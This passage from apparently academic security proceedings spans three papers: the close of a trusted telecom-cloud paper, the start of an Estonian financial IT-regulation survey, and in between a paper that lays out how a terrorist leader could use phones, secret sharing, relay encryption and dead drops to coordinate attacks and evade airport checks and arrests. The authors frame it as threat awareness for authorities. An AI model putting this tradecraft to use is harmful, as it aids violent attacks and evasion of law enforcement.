appearance of multiple boxes on a single hardware platform and run applications of varying assurance
levels in the appropriate box. The Terra also supports certificate-based attestation to fulfill platform
integrity requirement. Furthermore, (Garfinkel et al. 2003) also claim high assurance level for Terra due to
its small size, however a formal proof for such claim is lacking.
Some other papers particularly address mechanisms to fulfill Platform Integrity requirement identified in
this paper. (Huang & Peng 2009) and (Sailer et al. 2004) propose remote attestation which leverages
TPM based cryptographic attestations by sending Integrity Measurement Log (IML) in combination with
TPM_Quote which is securely computed by the (TPM 2007). The verifier compares the quoted response
with self computed hash value from the IML to check and decide about the integrity of the target platform.
Similarly, (Kuhlmann et al. 2006) propose alternate mechanism for remote attestation by introducing
property-based attestations instead of cryptographic attestations to make it a scalable solution. (Haldar,
Chandra & Franz 2004) also propose a similar remote attestation technique to fulfill platform integrity
requirement. All these papers mainly discuss remote attestation techniques which are important to meet
288

Mudassar Aslam and Christian Gehrmann
the requirements discussed in section 3.2, but need to be complemented in order to fulfill the
requirements identified in section 3.3.
The architecture introduced by (Jansen, Ramasamy & Schunter 2006) presents ways to protect the
confidentiality of the user VM by leveraging sealing mechanism supported by TPM. We have also
recommended sealing mechanism in Table 2 to fulfill confidentiality requirement. Finally, (Gasmi et al.
2007) propose a trusted channel which focuses on the integrity of the target platform in establishing a
secure session. The trusted channels also features trusted computing mechanisms for establishing trust
between end entities. The proposed trusted channel is targeted for secure transactions over the internet
by end users. A trusted channel is not equivalent to a complete secure launch protocol with nonrepudiation
properties as discussed in section 3.3. However, the main principles for the design of such
channels, give the basic building blocks for constructing a VM launch protocol that can meet the
requirements we have identified in this paper.
5. Conclusion
In this paper we have presented a scenario in which virtualized telecommunication resources making up
the telecommunication cloud, are provisioned to different telecommunication operators. We have
performed a detailed security analysis of the addressed scenario taking both stakeholders’ concerns into
account. We started with identifying major security threats followed by a detailed security requirements
analysis with the focus on trust establishment between stakeholders. Our results present a summary of
probable security threats, stakeholders’ security requirements and our recommended mechanisms to
create trusted telecommunication clouds. Finally, we presented existing related work which on
comparison with our security analysis, shows that this paper consolidates possible security requirements
from all existing body of literature. However, there are some other security requirements which are
identified in this paper but not addressed so far by the research community. Hence, this paper identifies
open research with respect to virtual platform provisioning, and therefore may serve the basis for
identification of further research in this area.
References
Berger, S, Cáceres, R, Pendarakis, D, Sailer, R & Valdez, E 2008, 'TVDc: Managing Security in the Trusted Virtual
Datacenter', SIGOPS Oper. Syst.
Bishop, M 2004, Introduction to Computer Security, Addison-Wesley Professional.
CC 2011, The Common Criteria, http://www.commoncriteriaportal.org/ .
Chisnall, D 2007, The Definitive Guide to the Xen Hypervisor, Prentice Hall PTR, Upper Saddle River, NJ, USA.
CircleID 2009, Survey: Cloud Computing 'No Hype', But Fear of Security and Control Slowing Adoption,
http://www.circleid.com/posts/20090226_cloud_computing_hype_security/ .
'Cloud Computing and Security – A Natural Match' 2010, Trusted Computing Group (TCG),
http://www.trustedcomputinggroup.org/.
CSA 2009, Cloud Security Alliance, http://www.cloudsecurityalliance.org/ .
Doorn, LV 2007, 'Trusted Computing Challenges', Proceedings of the 2007 ACM Workshop on Scalable Trusted
Computing, ACM, New York, NY, USA.
Garfinkel, T, Pfaff, B, Chow, J, Rosenblum, M & Boneh, D 2003, 'Terra: a Virtual Machine-based Platform for Trusted
Computing', ACM Press.
Gasmi, Y, Sadeghi, A-R, Stewin, P, Unger, M & Asokan, N 2007, 'Beyond Secure Channels', Proceedings of the
2007 ACM Workshop on Scalable Trusted Computing, ACM, New York, NY, USA.
Griffin, JL, Jaeger, T, Perez, R, Sailer, R, Doorn, LV & Ca'ceres, R 2005, 'Trusted Virtual Domains: Toward Secure
Distributed Services', In Proc. of the First Workshop on Hot Topics in System Dependability, IEEE Press.
Haldar, V, Chandra, D & Franz, M 2004, 'Semantic Remote Attestation - A Virtual Machine directed approach to
Trusted Computing', USENIX Virtual Machine Research and Technology Symposium.
Huang, X & Peng, Y 2009, 'An Effective Approach for Remote Attestation in Trusted Computing', WISA 2009 :
Proceedings of the 2nd International Symposium on Web Information Systems and Applications, Academy
Publisher, FIN-90571, OULU, FINLAND.
IKE 2005, 'Internet Key Exchange (IKEv2) Protocol', Internet Engineering Task Force (IETF), RFC 4306.
IPsec 2005, 'Security Architecture for the Internet Protocol', Internet Engineering Task Force (IETF), RFC 4301.
Jansen, B, Ramasamy, HV & Schunter, M 2006, 'Flexible Integrity Protection and Verification Architecture for Virtual
Machine Monitors', The Second Workshop on Advances in Trusted Computing.
Kuhlmann, D, Landfermann, R, Ramasamy, HV, Schunter, M, Ramunno, G & Vernizzi, D 2006, 'An Open Trusted
Computing Architecture - Secure Virtual Machines Enabling User-Defined Policy Enforcement',
www.opentc.net.
KVM 2007, Kernel Based Virtual Machine, http://www.linux-kvm.org/page/Main_Page .
Linthicum, D, Knorr, E, Gruman, G, Scheier, RL, Beckman, M & Wayner, P 2009, Cloud Computing Deep Dive,
Sepcial Report, viewed 2010, http://www.InfoWorld.com .
289

Mudassar Aslam and Christian Gehrmann
Ormandy, T 2007, 'An Empirical Study into the Security Exposure to Hosts of Hostile Virtualized Environments',
CanSecWest.
Sailer, R, Zhang, X, Jaeger, T & Doorn, LV 2004, 'Integrity Measurement Architecture', The Proceedings of the 13th
USENIX Security Symposium, San Diego, California.
Santos, N, Gummadi, KP & Rodrigues, R 2009, 'Towards Trusted Cloud Computing', Proceedings of the 2009
Conference on Hot Topics in Cloud Computing, USENIX Association, Berkeley, CA, San Diego, California.
'Security Guidance for Critical Areas of Focus in Cloud Computing' 2009, Cloud Security Alliance, V2.1,
http://www.cloudsecurityalliance.org/guidance/csaguide.v2.1.pdf.
Smith, J & Nair, R 2005, Virtual Machines: Versatile Platforms for Systems and Processes, Morgan Kaufmann
Publishers.
TCG 2003, Trusted Computing Group, http://www.trustedcomputinggroup.org/ .
TCG Specification Architecture Overview 2007, http://www.trustedcomputinggroup.org/resources .
TPM 2007, TPM Main Specification, http://www.trustedcomputinggroup.org/resources/tpm_main_specification
'Trusted Multi-tenant Infrastructure (TMI)' 2010, Trusted Computing Group (TCG),
http://www.trustedcomputinggroup.org/developers/trusted_multitenant_infrastructure.
VMware 2010, VMware Inc., Virtualization Solutions, http://www.vmware.com/virtualization/ .
290

A Mobile and Quick Terrorism
Anthony Desnos and Geoffroy Gueguen
Operational Cryptology and Virology Laboratory (CVO), ESIEA, France
desnos@esiea.fr
gueguen@esiea.fr
Abstract: New technologies bring significant changes into our way of life, and mobile phone is one of them. It is an
item which follows us everywhere, it has become somehow a part of our body. The fact is that nowadays mobile
phones are like little and powerful computers. You can travel from a country to another one without your mobile
phone being controlled by authorities, and that is an interesting characteristic. However your mobile phone can be
turned into a new weapon for modern terrorism. It will not be use as a weapon to attack a target (it can be used in a
bomb [Madrid, 2004]), but to synchronize an attack between different unknown terrorists who do not know each
other. The idea is to follow a terrorist from his formation in an Al quaeda camp to the final attack. We will see how it is
possible for a terrorist leader to perform and plan an attack by creating a mobile application, and by giving mobile
phones (with an embedded application) to different “jihadists”.
Keywords: terrorism, mobile phone, android, cryptography
1. Introduction
If terrorists want to use smart phones, they have to resolve few questions :
How a terrorist leader can control different terrorists ?
How can he establish a connection with a chosen terrorist by identifying him ?
How to secure the communications and to verify the identity of the leader ?
How a terrorist can recognize another one to be able to perform the final attack ?
How we protect the leader’s identity even if some mobile phones are caught by authorities ?
We will use cryptographic techniques like the secret sharing scheme (Shamir, 1979) to efficiently and
quickly perform all the attack operations, even if we saw terrorisms use old techniques (TheRegister
2011). Of course, we will show how to avoid the system to be tampered when a terrorist has been
caught, and how to prevent the leak of the leader’s identity as well as the one of the other terrorists.
Moreover, we must protect our application with respect to controls in airports by using stealthy
cryptographic techniques (Filiol, 2010) in order to prevent the detection based on the entropy.
In the first part, we will describe the basic equipment of a group of terrorists, next we will see how the
communication can be established between the leader and a “jihadist”, and between the leader and
different “jihadists”. Finally we will discuss about the consequences if a terrorist is arrested by authorities.
2. Terrorist leader − terrorists
2.1 The beginning
During the training of each “jihadist”, the leader selected a team composed of X members. For each
member of the team, the leader created a shared secret (Z points, with a threshold of T), and each
member of the team has:
A classic mobile phone with a SIM card,
A pre-installed application with : – X (T - 2) integers values (encoded in the application like data), – a
password given orally (or by any other equivalent secure mode).
Nowadays, it’s very interesting to use a classic mobile phone, because this kind of object is very
common, and moreover it is not verified in the airport. Even if a control is performed, the mobile phone
has to be root (or jailbreak) to find a hidden secret, this is not possible as a standard procedure for every
passenger.
291

Anthony Desnos and Geoffroy Gueguen
Figure 1: Initial characteristics of a leader and jihadists
2.2 Interaction
So the leader must have a secret sharing with each “jihadist”. This secret will be used like an
authentication to extract a valid password to decode a communication (for example, through a SMS).
For example, the threshold is 3, and the values (integer) of the secret sharing are :
X1, Y1,
X2, Y2,
X3, Y3,
X4 (a password transformed into an integer), Y4.
The leader have all interesting values :
X1, Y1,
X2, Y2,
X3, Y3.
And the “jihadist” :
X3, Y3,
X4, Y4.
When a leader wants to send a message to a “jihadist”, he sends him X2, Y2. Next, the leader uses X1,
X2, X3 to create the secret, which is then used to encode a message. The “jihadist” can decode the
message with X3, X2 and X4 by solving the secret sharing which is the password of the message.
292

Anthony Desnos and Geoffroy Gueguen
Figure 2: Initial exchange between a leader and a jihadist
2.3 Shamir’s Secret Sharing
Shamir’s Secret Sharing [SHAMIR] can implement this scheme. It comes from the idea that 2 different
points are sufficient to define a line, 3 different points are sufficient to define a parabola, 4 different points
to define a cubic curve ... That is, it takes k different points to define a polynomial of degree k − 1. To
build the polynomial, choose randomly (k − 1) coefficients a1 , ...., ak−1 , and let be a0 the secret :
Every participant (in our case, a “jihadist” and the leader) is given from a point X of this system, a pair (X,
f (X)) (where each X must be different). When k participants are present, the secret can be found,
otherwise it is impossible to recover it.
Our secret is our private key to encode a message.
293

Anthony Desnos and Geoffroy Gueguen
The threshold at which it is possible to find the secret is determined between the “jihadist” and the leader,
to be the half of the generated values.
2.4 Neville-Aitken’s algorithm
When the leader wants to initiate a communication with a “jihadist”, he must send him one of his
elements, and the “jihadist” has to reply with one of his (it must not be the password). The procedure is
mandatory to perform the calculation of the secret a0 to encode the message.
To do this we can use Neville-Aitken ’s algorithm (Neville, 1992) to find a coefficient that allows to
calculate any degree of the polynomial :
In this case, we just want the coefficient of degree 0 (which is the key or the password) so :
This algorithm has a space and time complexity both in O(n^2), and can be implemented easily in python
(listing 2).
3. Communication
There are plenty of ways a leader can communicate with a given “jihadist”. We expose some of them in
the following section. The first way is what we could call as “standard”, while the second case uses some
new technology.
First, we explain how the leader can send some data to a given person in a “secure” way, in the sense
that if at some point, a communication is insecure, it will not expose the data. We explain also how he
can send some data in a discreet way, so that the communication is not too suspicious.
294
I

Anthony Desnos and Geoffroy Gueguen
So, the leader has some data to be sent to a specific person (we’ll call it X ). The easiest way to do it
would be to just send the plain data, but this method has some drawbacks :
The connection between X and the leader is easy to make.
Each time the leader wants to communicate with someone, the communication is direct. So the
leader is the central point of all the communications and thus is easily recognizable (but it's possible
that the leader use each time a unique SIM card).
The data is not protected against eavesdropping so “anyone” can access it.
In order to address these issues, we propose the following scenario :
The leader (as well as all the people involved in the attack) has a phone in which a public-private key pair
is present. Moreover, each participant has its own password (which is given at some time, in a training
camp for example).
The leader, who wants its data to be only available to X, will encrypt it with X ’s public key (so, only X’s
phone is able to decrypt the data). The leader will do a secret sharing by splitting the ciphertext obtained
into a number N + 1 of elements (and fixing one part of this secret to the password of X ), N being the
number of middleman he wants to use to transfer the ciphertext to X.
As an example, let’s say that N = 3. We will call these three intermediates Y, Z and T. The leader, who
knows the phone number of each participants, send to Y, Z and T an encrypted message (by using each
participant’s public key) in which there is a time, a destination, and one part of the secret (but not the
password one) to send to X. Each participant has then to decrypt the message to know that they have to
send some data to some destination at some given time. (Note: the time has not to be the same for all
the participants, as the construction of the message can be spaced over time for more discretion).
When X finally receives all the parts he can recover the secret by adding its password to the data
received. Thus, if his phone is taken by some police force, only X is able to recover the data.
The process can be a little more elaborate than this, as the leader may use more than three
intermediates, and can use a different scheme. Indeed, instead of only having one “level of indirection”
with X, it is possible to encapsulate a level into another one. Let’s take our Y, Z and T again. The leader
can encrypt some data destined to X with X ’s public key. Then, using T ’s public key, he encrypts the
already encrypted data as well as the time at which the delivery has to be done, with the number of X (the
destination). Then he does the same for Z (he encrypts the encrypted data to be sent to T as well as the
time at which the delivery has to be done, together with the number of T ) and for Y.
Finally, the leader send the encrypted data to Y, who will decrypt it and send the result to Z at some given
time, and so on until at last X get the former data that the leader wanted to send him.
Of course, the leader can use these two ways at the same time. These schemes have some drawbacks
though : all the parts that are derived from the secret have to be known to be able to recover the data,
and every participant ends to know each other phone number. These schemes can be modified to be
tolerant to a lost of one or more part by using the password of a participant as the private key of the
encryption process. So the leader can use a “classic” secret sharing with the secret being the data to be
sent encrypted with the public key corresponding to X ’s password.
In order to address the problem of participants ending to know the phone number of others, a different
way to communicate can be used. As an example, the leader may use a website to indirectly
communicate by posting some messages containing the right data.
Other technologies can be used, as the following : the communication from the leader to a specific
“jihadist” can be performed with Perseus in order to have a low entropy. The leader encode the message
with the secret found from the secret sharing. When a “jihadist” receives a message, he uses his
password and the latest value from the leader to extract the secret and decode the message. It will work
only if the password and the value are correct.
295

Anthony Desnos and Geoffroy Gueguen
Figure 3: Communication between a leader and a jihadist with perseus
4. How can two (or more) individuals may recognize each other to perform the
attack
In this section we explain how a leader can set-up an attack in which two (or more) participants are able
to recognize each other in order to perform an attack. The idea, which is pretty simple, is the following :
the leader generates some secret S to be shared (e.g the instructions of the attack) and divide it
depending on the number of participants : if there is N participants, the secret has to be split into 2N-1
parts, with N parts needed to recover the data.
N of these parts have to be the password of each participants, the others (N-1 ) are generated randomly.
When the attack has to be done, the leader choose a way to be used by all the participants to
communicate between each other (for example a website, like pastebin.com) and send it to each
participants, as well as one part deriving from the secret. Some participants may receive the same part.
Then each of them communicate with each other (for example in the case of pastebin, they just post the
part they were given). All participants have then access to N-1 parts of the secret, and they can recover
the secret with their own password.
5. Arrest
If a “jihadist” is arrested by government authorities, all information are on the mobile phone. So they will
find :
X3, Y3,
296

X2, Y2,
Encoded messages.
Anthony Desnos and Geoffroy Gueguen
They have not enough information to resolve the secret sharing in the mobile phone to decode
messages, because the last information is only known by the “jihadist”.
Figure 4: Impossible to find enough information due to the scheme
6. Conclusion
The increasing amount of new devices bring some new vectors of attack that the authorities have to take
into account. Indeed, mobile phones embed more and more powerful components, making them a new
threat to be considered. They are not really checked in airport, and when they are, it is not an easy task
to have access to all the data that are inside : the phone has to be jailbreak / root, and doing so for every
passenger is not really an option. As we saw, they can be used to establish a communication (it's their
primary use after all) between criminals. The communications can be secured by using some “everyday
cryptography” (asymmetric encryption), or by using some new techniques like Perseus. The techniques
presented in these papers are mostly not new - the Shamir Secret's Sharing is more than 30 years old,
but are not yet exploited.
Acknowledgement
Thanks to Eric Filiol for the original idea and Robert Erra for reviewing the paper.
References
Filiol, Eric (2010), PERSEUS Technology: New Trends in Information and Communication Security
Madrid (2004), http://en.wikipedia.org/wiki/2004_Madrid_train_bombings
Shamir, Adi (1979), "How to share a secret", Communications of the ACM 22 (11): 612–613
Neville (1992), Press, William; Saul Teukolsky, William Vetterling and Brian Flannery (1992). "§3.1 Polynomial
Interpolation and Extrapolation". Numerical Recipes in C. The Art of Scientific Computing (2nd edition ed.).
TheRegister (2011), http://www.theregister.co.uk/2011/03/22/ba_jihadist_trial_sentencing/
297

Regulatory Compliance to Ensure Information Security:
Financial Supervision Perspective
Andro Kull
School of Information Sciences at the University of Tampere, Finland
Andro.Kull@fi.ee
Abstract: The last financial crisis shows that more control is necessary for the financial sector. Controls should be
planned and realized at the international, country and bank levels because everyone who has to use financial
services wants to be sure that data about their assets are secure. Almost everyone use the electronic services of
financial institutions and therefore information security issues can not be overemphasized. To increase security in
computerized actions of financial institutions, a certain supervisory authorization must be established. In order to
cleverly realize such questions as “How much security is necessary?”, “How much security is sufficient?” and “How to
be shore that operations are secure”, a systematic approach to assess the state of security is necessary. In the
current case, these questions should be answered by financial supervisors to provide assurances that people’s
money is safe in banks and in other financial institutions. In this paper we shall propose a new compliance
assessment and monitoring method for these purposes. The key concept presented and used through the research
is named as technology assurance (TA), it is all which gives the feel of security in using technology and this may be
treated as synonym for the term information assurance (IA). To ensure technology assurance, the lowest steps have
to be passed to go higher level. Technology assurance presumes that business processes are well organized,
information assets and IT governance is well established and IT risks are managed to build up higher level
assurance like information security measures, information systems/information security auditing and to reach highest
levels like business continuity preparation. To answer to the main research questions mentioned above, the subquestions
like “How much to regulate?” should be answered. Considering some facts about Estonia and financial
sector - Estonia is a member of European Union, the bigger banks in Estonia are the subsidiaries, we have launched
Euro lately - it is essential to be in accordance with European practices in developing our standards to regulate the
financial sector and IT field. During the research, survey about current arrangements in 29 European countries was
studied and this paper describes the survey focusing on the results. The question was: how the European countries
regulate financial sector IT field and what the requirements are the financial institutions should fulfill to ensure the
security of electronic operations? The main results of survey show that the most important issue to cover with
regulations was IT risk management, also business continuity process and information security policy were covered
in most cases. About a half of respondents highlight the need to regulate IT outsourcing and access control
management issues. In common, the survey confirms the trend for more strict regulation of IT in financial sector and
Estonia tends to be top level regarding regulations.
Keywords: information technology, information security, business continuity, compliance assessment, financial
sector
1. Introduction
The survey described in this paper is a part of bigger research called “A Method for Continuous
Information Technology Supervision: The Case of the Estonian Financial Sector”. In the introduction, I
give an overview about the whole study so that reader can easily understand the content and purpose of
survey presented below.
Literature review presented during the research shows the number of theories, solutions,
recommendations, best practices and standards in connection with information technology and
information security. For example, COBIT (ISACA, 2010), SABSA (2010), COSO (2010), CMM (1993),
GAIT (Institute of Internal Auditors, 2010), OCTAVE (CMU/SEI, 1999) etc. The questions and topics are
highlighted and relevant examples from different studies are presented, and afterwards, through the
steps of research, our own approach is presented to deal with the problems and topics. From scientific
point of view, author sees too little attention to using existing knowledge for certain task and combining
different approaches to produce new ones.
Next, IT supervision approach is discussed with the purpose to highlight the features in this area. An
overview about IT supervision activities, it is off-site and on-site activities are highlighted. The tendency
shows that systematic approach is needed for IT supervision. New IT supervision method will be
proposed to support the off-site inspections and should give possibilities to enter the results for on-site
inspections.
298

Andro Kull
To go further, IT risks are enlightening more detail from supervisory perspective and there are some
differences with traditional IT risk approach. Supervision divides two principle risk sites: risks before
control and risk controls. Concrete risk scales are described and presented.
The research continues with requirements to reduce the level of risk. First the process of working out the
advisory guidelines is described and the guidelines in connection with IT field are drawn up using the key
concept, i.e. for IT governance, information security and business continuity. To conclude with the
requirements, a common approach in European level is surveyed and the main results of this survey are
pointed.
To motivate the importance of producing the field regulations, a lot of arguments may be highlighted.
First, advisory guidelines are the main tool to enforce supervised entities’ duties to ensure secure
operations and for supervisors in conducting IT supervision activities. Also, considering the connections
with European level – European Union membership, Euro, parent banks from Europe, the same high
level approaches (for example Basel II), the local requirements should conform with the general practice.
The research continues with analysis how the stated requirements may influence the supervised entities
and determining the criteria for requirements. To deal with possible costs for initiatives to conform to
supervisory requirements, the supervised entities were studied about how they today conform to
requirements and is there a large gap between existing and required measures. As a conclusion we have
got some confidence that the requirements stated before are not too burdensome for supervised entities
and in general, the main activities are carried out to meet the requirements.
The study proceeds with finding out the criteria to meet the requirements. The first version of relevant
handbook is compiled and this handbook has to be a subject of continuous improvements considering the
real assessments, the financial sector changes, etc. Compliance criteria and weighting help to answer the
question of what kinds of criteria should be used to ensure compliance with requirements and how to
assure equal treatment of market participants. The criteria handbook is the most valuable outcome of the
whole research.
The research proceeds with scoring issues based on the requirements and criteria stated beforehand.
Some widely known security assessment approaches are described and possible measures and metrics
are studied. Using this knowledge, the scoring scale for IT supervision is proposed and a real use case is
conducted. This is the first attempt to check applicability of criteria handbook in practice.
The research continues with determining the systematic approach for making assessment. We give an
overview about the attempt to realize the IT supervision approach in appropriate IT solution. The need for
IT solution to deal systematically with compliance assessment is explained and a pre-analysis of
expected solution is proposed following the context description and functional and non-functional
requirements analysis. The basics are outlined to create IT solution for compliance scoring.
The research proceeds with summation of previous results and putting together method, i.e. all the
pieces studied beforehand for continuous information technology supervision. Once the method is
implemented in practice, further examination begins to determine those entities with good compliance
with IT requirements and are they experiencing lower level losses in the case of IT incidents. Based on
that examination the reasons will be explored, if it is not true, and next, the method will be improved. The
main purpose of research – systematically examine the core content of IT supervision – is achieved and
the main result – an IT supervision method – will be implemented into everyday supervision work.
2. European supervision
“Requirements for IT in European supervision authorities” study helps to answer the question of what
requirements are reasonable to ensure security and which of them are obligatory.
Research question was - how European financial supervision authorities regulate the IT area?
Next, description of the study of requirements in the IT area in European countries’ supervision
authorities follows.
299

2.1 Research model
Andro Kull
The idea considered throughout the study is to combine all sufficient best practices and international
standards, use the set for building appropriate method for IT supervision and apply it for Estonian
financial sector. The key concept presented in Figure 2.1 and used through the research is named as
technology assurance; it is all which gives the feel of security in using technology. This may be a
synonym for the world information assurance (IA).
To ensure technology assurance, the lowest steps have to be passed to go higher level. Technology
assurance presumes that business processes are well organized, information assets and IT governance
has to be well established etc to build up higher level assurance like working business continuity process.
COMPLIANCE ASSESSMENT
Internal requirements, external requirements, compliance criteria,
compliance assessment, compliance monitoring
IT AUDITING
Security audit, IT project audit, system audit, technology audit
BUSINESS CONTINUITY
Business continuity planning, recovery planning, recovery testing
INFORMATION SECURITY
Information security management, IT security measures
IT RISK MANAGEMENT
Business risks, IT risk assessment, measures for risk mitigation
IT GOVERNANCE
IT strategy, IT management, IT organization, outsourcing, IT
development, IT maintenance
INFORMATION ASSETS
Identifying all critical and important information assets, responsibilities
BUSINESS PROCESSES
CRITICAL INFRASTRUCTURE PROTECTION
Figure1: Elements of IT assurance
A study on how European supervision authorities regulate the IT area was conducted in August 2008. 27
European Union countries, Norway and Croatia were surveyed.
The study method was systematic review of collected documentation. The review was organized in such
a way that all relevant keywords were accounted and if there was a description in connection with certain
keyword, that fact was noted. The keywords are proposed as what areas in connection with IT may be
important to regulate and also the keywords of the key concept where the focus. In setting up the
keywords, the IT field was divided into three parts – IT governance, information security and business
continuity and lower-lever topics.
2.2 Data gathering
The information and materials about the requirements were researched in relevant web-pages and a
simple keyword search gave results, i.e. the regulative documents for only one third of the countries.
Considering the poor results of web search, an e-mail was compiled with the generic e-mail addresses of
the supervision authorities. The e-mail contained the following request:
300

Andro Kull
“I am writing to you on behalf of the Estonian Financial Supervision Authority, where I am responsible for
IT field supervision. Since we are conducting a small survey regarding what kind of requirements are in
place for the IT field in the financial sector throughout European Union Member States, we have already
examined your web-sites, but we have been unable to locate clear documents or links to the relevant
information. We are interested in the whole financial sector (banking, insurance, etc.) and we are
covering the main components of IT (IT governance, information security, business continuity). The
results of this survey will be used for the improvement of our regulations in the IT field of supervised
entities.
Considering the information above, please give a short answer to the following questions:
What kinds of regulations contain requirements for the IT field of supervised entities in your country?
Are these regulations freely available via the Internet?
If so, is it possible to provide the exact link to the adequate information?
If not, is it possible to send the relevant files via e-mail?
In case the relevant information is only for internal use, could you please describe what are the
common demands for the IT field of supervised entities?”
Responses were received to about one half of the sent e-mails, accounting for another one third of the
participating countries. The other third of the countries did not answer the e-mail and keyword-searches
also failed to provide a result, so there is no information about do these countries regarding whether they
have established IT requirements or not and what kind of requirements they may be. The results of the
study are composed based on two thirds of the participating countries and the author considers it
adequate enough to make reasonable conclusions.
2.3 Data analysis
Categories and statistics about different areas are illustrated with next three figures following the main
themes.
20
18
16
14
12
10
8
6
4
2
0
Information architecture
IT organization
IT strategy
IT risk management
IT Governance
IT development
Change management
IT outsourcing
Problem management
Monitoring
Figure 2: Summary of study of European supervision – IT governance
Information architecture is mentioned only by two countries. It is not surprising because the decisions
about infrastructure should mainly depend on business needs. Still it may be important to supervisors too
because the possibility to reach the end location of data and systems.
IT organization, certainly, should be appropriate; segregation of duties has to be maintained etc.
IT strategy could be valuable source to detect which developments are planned and consider the
possible risks beforehand.
301

Andro Kull
IT risk management is the most marked point and means that majority of supervised entities require the
subjects themselves carry out the risk assessments and decide about the appropriate measures. Still, a
supervisory risk will position next to it.
IT development should take into account and the information security needs like for example system
controls, logging of operations etc. have to be implemented.
Change management seems to be more and more important as the systems functionality and data loads
grow.
IT outsourcing is certainly one possible source of risks and outsourcing partners have to in supervisors
focus.
Problem management is a corrective measure and it goes with the incident management.
Monitoring is detective measure. It is right to presume that supervised entities have implemented
procedures and systems to detect deviations from normal functioning.
As a conclusion for IT governance topics, a lot of attention is paid to the IT risk management, outsourcing
and monitoring. Less attention is paid to the information architecture and this indicates that the
architecture is to decide on the competence of supervised entities.
16
14
12
10
8
6
4
2
0
Security policy
Security organization structure
IT Security Governance
Asset classification
Physical Security
Communications security
Access Control Management
Figure 3: Summary of study of European supervision –IT Security governance
Security policy should clearly reflect the needs for information security and objectives, also the roles and
responsibilities.
Security organization establishment may be a subject for consideration if it is absolutely necessary for
each, i.e. for bigger banks and for smaller investment firms. In any case, there should be confirmed clear
responsibility for information security issues.
Asset classification is not in many cases regulated and the reason could be that financial information and
personal data is sensitive by default and needs to be protected.
Physical security measures are mentioned by half of the cases. Here may be the possibility to link with
other standards, for example, to build a server room.
302

Andro Kull
Communications security seems to be a growing area and more tight regulation can be expected over
time.
Access control management is quite well regulated. Access management is also direct link between
business and IT and all the categories of information security measures should be accounted – physical,
organizational and technical.
As a conclusion for information security governance, a lot of attention is paid to the information security
policy and access control management. Less attention is paid to information security organization and
information assets classification.
18
16
14
12
10
8
6
4
2
0
Business continuity
process
Business continuity
Business continuity plan Business continuity testing
Figure 4: Summary of study of European supervision – business continuity
Business continuity process is required in most cases. Business continuity plans are required in most
cases and testing of business continuity plan is needed about half the cases. However, the existence of
such a plan does not guarantee if it is working or not and business continuity testing seems to be
obvious.
Business continuity regulation follows certain logic and it starts with requirements for process and
continues with planning and testing as the outcomes of this process.
2.4 Conclusion
As a first conclusion, eight countries have a rather high level of regulation, five countries have mid-level
regulation and nine countries have a low-level of information technology regulation. There is no
information about six of the countries, and one of respondents announced that they do not have specific
regulations for information technology. As next conclusion, there is remarkable difference about the
strength of regulation between countries in connection with IT field regulations. In addition to “must” and
“shall” usage difference, also the levels of regulation vary from guidelines to acts.
A common conclusion is that all the main areas and categories are somehow covered meaning classic
information security. To illustrate the idea, Table 2.1 is presented.
For example, a measure “access control management” as stated by guidelines is a preventive measure
and may be solved through organizational, technical and physical activities. While a measure
“monitoring” is a detective and mostly is solved through implementation of technical processes.
303

Andro Kull
Presented classic information security matrix is a useful evaluation tool to consider that all areas and
categories are taken into account in concluding with requirements.
Table 1: Categories of information security measures
Preventive measures Detective measures Corrective measures
Organizational measures
X
X
X
Technical measures
Physical measures
X
X
The results of the study, about how the IT field is regulated in European countries, could be used further
as follows:
In setting up the requirements for information security in Estonia, we consider mainly excellent
examples such as Greece, Finland, Slovakia, the Netherlands and Latvia;
Later, when analyzing all of the requirements and pointing out the criteria for assessment, we can
use as a comparison descriptions of those requirements which are handled thoroughly.
Going forward, the real circumstances will be considered. Estonia had two regulations for IT field in
financial sector and they were developed for IT governance and business continuity. After the survey,
immediately arose a need for additional regulation for information security.
3. Estonian supervision
The results of survey among European financial supervision authorities gave some impacts for
completing Estonian regulative guidelines for information security field.
3.1 Advisory guidelines process
The initiative for creating advisory guidelines comes from Estonian Financial Supervision Authority
(EFSA) to more precisely regulate the areas important for stability of market.
There is a need for more concrete regulation for market. First, it helps subjects to set up their own
specific internal regulations and second, it helps to explain the importance of IT and information security
measures and the need for investments for implementing the measures.
After the first version of guidelines they are under discussion inside of FSA. After that it comes to the
market participants for comments. Considering the feedback, next versions will be developed and
discussed. After common consensus the next version, the guidelines will be published.
Generally the next version which comes to establishment will be introduced to all interested parties in
relevant seminar.
Between development and establishment of guidelines an adequate time buffer will be left, so the
subjects can complete the actions to be in compliance with new regulations.
3.2 Financial Supervision Authority
Estonian Financial Supervision Authority’s objectives of financial supervision (2010) states that: “The
main objective of supervision is to ensure that financial institutions are able to meet their obligations to
the customers in the future - pay out deposits, insurance losses or pension contributions, etc. An
important task of the Financial Supervision Authority is also to help to increase the efficiency of the
Estonian financial sector, avoid systemic risks, and prevent the abuse of the financial sector for criminal
purposes. The work of the Authority also involves explanation of which are the risks for the customers
and provide information and support to them in choosing financial services.”
This statement gives the first indicatives that risk assessment and management should be implemented
into financial institutions everyday business.
304
X
X
X
X

3.3 Credit Institutions Act
Andro Kull
The initiative of creating more precise requirements to regulate IT in financial sector comes, for example,
from credit institutions act by following statements:
“All data and assessments which are known to a credit institution concerning of the clients of the credit
institution or other credit institutions are deemed to be information subject to banking secrecy.
The managers and employees of a credit institution and other persons who have access to information
subject to banking secrecy are required to process the data which is subject to banking secrecy in
conformity to the Personal Data Protection Act and maintain the confidentiality of such information
indefinitely, unless otherwise provided for in this Act.”
Guidelines must cover the most important fields stated in act and also in key concept – IT governance,
information security and business continuity.
For IT governance § 131 section 6 states „In order to apply for authorization, the members of the
management board entered in the memorandum of association or registry card of the company being
founded or operating (hereinafter applicant) shall submit a written application and the following
documents and information and other technological means and systems, security systems, control
mechanisms and systems needed for provision of the planned financial services“.
§ 55 section 8 „Among other obligations, the management board is required to ensure the existence and
functioning of systems to guarantee that information necessary for employees of the credit institution to
perform their duties is communicated thereto in a timely manner;“
For information security § 55 section 9 states „Among other obligations, the management board is
required to ensure the safety and regular monitoring of information technology systems used by the credit
institution and systems used for the safekeeping of assets of clients.”
For business continuity § 82 section 3 states: „A credit institution must prepare and apply operational
constancy plans in order to guarantee the restoration and continuity of business activities in the part of all
essential business processes.“
3.4 EFSA guidelines
Although legislative requirements are not precise, these statements give an indication which areas have
to be under consideration. In supervision meaning, the requirements from legislation have to be filled with
content. It gives a basis for development and implementation guidelines of Financial Supervision
Authority in information technology areas, which are freely available:
Requirements for the organization the field of information technology (2010);
Requirements for the organization of the field of information security (2010);
